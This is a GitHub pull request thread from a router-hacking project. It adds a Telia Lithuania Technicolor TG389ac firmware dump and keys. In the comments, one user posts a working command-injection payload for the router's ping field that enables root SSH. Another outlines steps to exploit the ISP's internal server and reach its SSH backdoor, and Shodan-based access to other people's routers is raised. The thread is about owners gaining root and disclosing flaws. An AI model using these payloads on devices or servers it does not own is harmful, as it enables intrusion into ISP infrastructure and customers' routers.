### PR TITLE
Added Telia LT TG389ac / GANT-1 16.1.7053 and OSIK

### PR DESCRIPTION
**Pull request by antnks**
Telia Lithuania Technicolor TG389ac
Added `bank_1` dump of `16.1.7053-1941003`
OSIK key seems to be the same as for `DANT-*`, but I included it anyway, as it is not in the repo yet
Also, verified that already available `GANT-1.osck` matches, so it is not included in this PR

This version is very handy as it contains local privilege escalation vulnerability and allows the user to remove all backdoors

### CODE REVIEW

**Comment by LuKePicci** [comment]
Please add those keys anyway, even if they match the other old ones.

**Comment by LuKePicci** [comment]
Sorry, I probably misunderstood your message. Is this a GANT-1 or DANT-something with keys equal to GANT-1 ones?

**Comment by antnks** [comment]
GANT-1.osck that I exctracted from my router is the same as the one already in the repo:   https://github.com/kevdagoat/hack-technicolor/blob/master/osck/GANT-1.osck
However, OSIK for GANT-1 is missing in the repo. I added it to the PR. But I can see the same OSIK is shared between other that are available in the repo.

**Comment by LuKePicci** [comment]
Alright. Yeah, old models shared keys between them, but we usually repeat them for each foe simplicity.

Would you like to add this firmwere to the wiki page as well? I will merge this immediately after.

**Comment by antnks** [comment]
This place? https://github.com/kevdagoat/hack-technicolor/blob/master/docs/Repository.md

**Comment by LuKePicci** [comment]
Yea, just after Com Hem, the timestamp is from squashfs header

**Comment by antnks** [comment]
Which root strategy should I put in?

**Comment by LuKePicci** [comment]
Tell me how you get root and I will check if it matches one of those strategies.

**Comment by antnks** [comment]
I used basic OS command injection as per @wuseman full disclosure page

**Comment by LuKePicci** [comment]
Ok, so it's probably supported by one of the AutoFlashGUI Generic profiles. Try testing root strategy #A (AutoFlashGUI) from here https://hack-technicolor.readthedocs.io/en/latest/Hacking/Type2/ and let me know which Generic profile (Ping/DDNS/AdvancedDDNS) works. In any case this is a Type 2 firmware with root strategy #A,

File: docs/Repository.md [hunk 1]
```diff
@@ -88,6 +88,7 @@ A basic ADSL only BCM6362 based gateway. Very useful as SIP ATA.
 | Type   | Version            | Timestamp  | Root Strategy | Mirror |
 |:------:|:-------------------|:-----------|:--------------|:-------|
 | 2      | 15.53.6568         | 2016-09-09 | #A            | [HTTPS](https://github.com/kevdagoat/hack-technicolor/raw/master/firmware/comhem-gant-1_15.53.6568-1721005-bank_dump.xz) - *note: this **IS NOT** an RBI firmware, it is a raw bank dump, you can't use with TFTP or regular firmware upgrade tools* |
+| 2      | 16.1.7053          | 2016-10-28 | ?             | [HTTPS](https://github.com/kevdagoat/hack-technicolor/raw/master/firmware/telia-gant-1_16.1.7053-1941003-bank_dump.xz) - *note: this **IS NOT** an RBI firmware, it is a raw bank dump, you can't use with TFTP or regular firmware upgrade tools*   |
```
Comment (LuKePicci) [inline docs/Repository.md]: Please, move this in a separate subsection for Telia, use other boards (like VANT-W) as examples of devices with firmwares from multiple ISPs

Comment (antnks) [reply docs/Repository.md]: Updated

**Comment by LuKePicci** [comment]
Ok, one more question, is this device known in Lithuania by some fency name or is it simply marketed as TechnicolorTG389ac?

**Comment by antnks** [comment]
It is known as `Technicolor TG389ac`
Here is link to PDF manual:
https://www.telia.lt/documents/20184/3710869/Technicolor+TG389ac+instrukcija.pdf/09333182-d700-428a-a1b4-50a112b6da00
And is seen here: https://www.telia.lt/privatiems/internetas/iranga for 99 eur

**Comment by LuKePicci** [comment]
Ok, we should probably list this as Teo instead of Telia if they shipped this devices before Teo was acquired. Do you agree?

**Comment by antnks** [comment]
Older devices have Teo sticker, newer have Telia. Should I update wiki to name it as `Telia/Teo Lithuania`?

**Comment by LuKePicci** [comment]
The general idea is to let people who search for teo tg389ac to find this as well. In other cases, we did something like this to handle rebrended firmwares https://hack-technicolor.readthedocs.io/en/latest/Repository/#iinet-internode_2

If they still ships this with Telia logo then we should probably go for "Teo & Telia Lithuania"

**Comment by LuKePicci** [comment]
All good, will appear in the wiki in a while. Let me know about compatible AFG profiles.

**Comment by antnks** [comment]
Sorry, what is AFG profile?

**Comment by LuKePicci** [comment]
https://hack-technicolor.readthedocs.io/en/latest/Hacking/Type2/ -> strategy #A -> AutoFlashGUI (aka AFG) -> https://github.com/mswhirl/autoflashgui -> download the app -> which one of defaults profiles works? There are some specially crafted in past for specific firmwares, there are newer Generic ones designed to work almost everywhere. If nono of them works we should compare the commands you injected to check why Generics failed. In your case I think wuseman was using Ping for 16.1,, so I expect "Generic (Ping)" defaults profile to work.
image

**Comment by antnks** [comment]
I never used this tool, just straight ping obuse through the web UI and got reverse shell

**Comment by LuKePicci** [comment]
Yes, but I need you to test for this tool and check which profile works.

**Comment by antnks** [comment]
Ok, sure. I will check that when I have a chance

**Comment by wuseman** [comment]
Just addig this as a notice about the router:

Stay safe!

https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html

**Comment by wuseman** [comment]
Screenshot

Since this is about Lithuania Model and using a Lithuania service, maybe someone may wanna try get ssh access this way, it may works on all no matter country, never tried myself: 

Service: https://www.telia.lt/mano/sso:

Source: https://full-disclosure.eu/reports/2019/FDEU-CVE-2019-10222-telia-savitarna-backdoor.html

**Comment by antnks** [comment]
Yes, I have seen this doc and I can confirm that there is an SSH backdoor running on router's port `8022`

Dropbear:
```
config dropbear
	option PasswordAuth 'off'
	option RootPasswordAuth 'on'
	option Interface 'voip'
	option Port '8022'
	option IdleTimeout '600'
	option enable '1'

config dropbear
	option PasswordAuth 'off'
	option RootPasswordAuth 'on'
	option Interface 'wan'
	option Port '8022'
	option IdleTimeout '600'

```
Firewall:
```
config rule
    option name 'Allow-SSH-WAN'
    option src 'wan'
    option proto 'tcp'
    option dest_port '8022'
    option src_ip '213.190.32.43/26'
    option family 'ipv4'
    option target 'ACCEPT'

config rule
    option name 'Allow-SSH-VoIP'
    option src 'voip'
    option proto 'tcp'
    option dest_port '8022'
    option src_ip '10.0.98.251 10.0.96.238'
    option family 'ipv4'
    option target 'ACCEPT'

```
However, in order to make use of it you need first to exploit Telia internal server `10.0.98.251` (as seen on your attached GIF):

1. use malicious ssh server to exploit stack corruption on the server side
2. leak RSA private key from the php process memory
3. connect Technicolor WAN to your laptop, start DHCP server, create VLAN 5 interafce and assign IP `10.0.98.251`
4. connect as user `engineer` and specify the key
5. escape `restricted-clash`
6. you are root

**Comment by antnks** [comment]
Well, it looks like the same public keys are specified in both `/etc/dropbear/authorized_keys` and `/home/engineer/.ssh/authorized_keys`:
```
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxf1GIio9OSLnQAu04PvDMddNfahLeOwpdFgVGs8zxpQ8CbSKihD3b1tuJ1J+OE7XC1bGWC8+zKHPiytI8OYcqrRzutdwX0vruc7Wm1w7R/LUg7gZinNGBoe4CHlOFUdLwibFHJHzZtQTZ7URwuBO4LVShcq9SR40qXZ6wWRlqEhDe+b9in2mVIkmGMbx4nw20UUIPoIaWbKwUkGk7f2Ge0naLUAC9UDa+NnHFA3wecoqkSGwp+JE9YvzdHttOnVuy5G640oki4AE8UqYxRHd5SOUGjYrOtZtd1rSMJie9HHWv7woO/rGnJzI5lY99mDhn86aX5QQgteR4u3dwmsjaQ== TCH Development
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCx0rrKPMW87VZfM6GA4PcBwsEv+swcumL6brgpRRvraNzKpcz3igdaJ4tTB7YeY7appLCUgepglqTZVytVhEh4I6mKmQ8J+Pn/kJ5/1lv3eQtJ+bFi8BAxebXHAiZTW8GyIEsvxiCk5yse7QJndev5cgzAQyb6+iJFIH6c/+lv/r6aM0y4tzttI48lw3Q2c3OBLsWQ+FMjqhohEA2OUTeFJgp0BLgSLprd5Yi4PjWwpr/1Q+s+xw3b2yikrczkaK+d+cxfzCEXJy3w/yqVyqzmpzNlBoZFvwaNDOxp3QGpfIM4BH3DHJf5OjWssy8DtrA2vIjSLQUWMdgfYV7pzgGR minmnk@MINMNK8M1
```
Which means that you actually login as root with any of the leaked keys

**Comment by wuseman** [comment]
Oh, I see. 

It is probably just enough to add below to the dropbear config to get access:

config dropbear
option PasswordAuth 'on'
option Interface 'lan'
option Port '8022'
option IdleTimeout '600'
option enable '1'

If you are allowed to use use ::::::;  in ping command this probably will be enough: 

    :::::::;echo  -e "\nconfig dropbear\noption PasswordAuth 'on'\noption Interface 'lan'\noption Port '8022'\noption IdleTimeout '600'\noption enable '1'" >> /etc/config/dropbear; /etc/init.d/dropbear restart 

Now try to ssh to router (login as: root and password is probably: root)

    ssh root@192.168.1.1

**Comment by antnks** [comment]
Yes, correct. That's how I got root with 16.1 version.

**Comment by wuseman** [comment]
Ah, sorry readed to fast.

What they key has been leaked, you mean id_rsa have been leaked for those authorized_keys?

Gosh, then anyone with the id_rsa file key can visit shodan.io, find a router, and ssh to router since there is no requirements for any ip in the dropbear config if they keep 8022 open on the wan network.

**Comment by antnks** [comment]
It is unknown yet if the key has leaked or no. According to the doc, Telia was informed back in 2019 and still has not fixed the internal vulnerability. There are high chances that after this public disclosure someone could finally exploit them and leak the key

**Pull request merged**